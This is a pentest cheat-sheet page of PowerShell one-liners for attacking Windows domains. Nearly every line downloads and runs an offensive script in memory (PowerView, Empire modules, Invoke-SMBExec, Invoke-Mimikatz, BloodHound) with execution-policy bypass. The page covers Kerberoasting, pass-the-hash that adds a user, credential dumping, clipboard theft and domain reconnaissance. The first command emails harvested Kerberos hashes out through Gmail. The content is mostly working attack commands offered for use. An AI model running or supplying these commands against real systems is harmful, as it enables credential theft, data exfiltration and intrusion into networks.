Pentest Book
Search…
PS tips & tricks

PS onliners

1
# Send email
2
powershell -ep bypass -c "IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1') ; Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt" ; $emailSmtpServer = "smtp.gmail.com" ; $emailSmtpServerPort = "587" ; $emailSmtpUser = "Add-Your-Gmail-Email-Address" ; $emailSmtpPass = "Add-Your-Gmail-Password" ; $emailMessage = New-Object System.Net.Mail.MailMessage; $emailMessage.From = "Add-Your-Gmail-Email-Address" ; $emailMessage.To.Add( "Add-Your-Gmail-Email-Address" ) ; $emailMessage.Subject = "Testing e-mail" ; $emailMessage.IsBodyHtml = $true; $emailMessage.Body = "test" ; $SMTPClient = New-Object System.Net.Mail.SmtpClient( $emailSmtpServer , $emailSmtpServerPort ); $SMTPClient.EnableSsl = $true ; $SMTPClient.Credentials = New-Object System.Net.NetworkCredential( $emailSmtpUser , $emailSmtpPass ); ; $attachment = "kerb-Hash0.txt" ; $emailMessage.Attachments.Add( $attachment ) ; $SMTPClient.Send( $emailMessage )
3
4
# Who's connected to DC
5
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/darkoperator/Veil-PowerView/master/PowerView/functions/Get-NetSessions.ps1'); Get-NetSessions -HostName WIN-O9LVH0D7KUN"
6
7
# List users in specified group
8
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/240711712e014f90b9e7d4f7e97f44c36cac65cf/powerview.ps1');Get-NetLocalGroup -HostName LAB22.server1.hacklab.local"
9
10
# User's groups
11
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1'); Get-NetGroup -UserName user1"
12
13
# PTH
14
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/master/Invoke-SMBExec.ps1');Invoke-SMBExec -Target 192.168.1.11 -Domain WORKGROUP -Username IEUser -Hash fc525c9683e8fe067095ba2ddc971889 -Command 'net user SMBExec Winter2017 /add'"
15
16
# See who's local admin
17
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/BloodHound_Old.ps1'); Get-NetLocalGroup -ComputerName WIN-O9LVH0D7KUN"
18
19
# Get DC names
20
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/BloodHound_Old.ps1'); Get-NetDomainController"
21
22
# List all machines names
23
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/BloodHound_Old.ps1'); Get-NetComputer -FullData | Get-NameField"
24
25
# What's copied in clipboard
26
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/collection/Get-ClipboardContents.ps1');Get-ClipboardContents"
27
28
# Check if you're local admin in any remote machine
29
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1'); Find-LocalAdminAccess"
30
31
# Run BH
32
powershell.exe “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/BloodHound_Old.ps1’); Get-BloodHoundData”
33
34
# Run mimikatz
35
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
36
37
# Get all A records in zone
38
Get-DnsRecord -RecordType A -ZoneName FQDN -Server ServerName | % {Add-Content -Value $_ -Path filename.txt}
39
Get-WmiObject -Namespace Root\MicrosoftDNS -Query "SELECT * FROM MicrosoftDNS_AType WHERE ContainerName='domain.com'"
40
41
# Get DC List
42
nltest /dclist, nslookup -q=srv _kerberos._tcp
Copied!
Last modified 4mo ago
Export as PDF
Copy link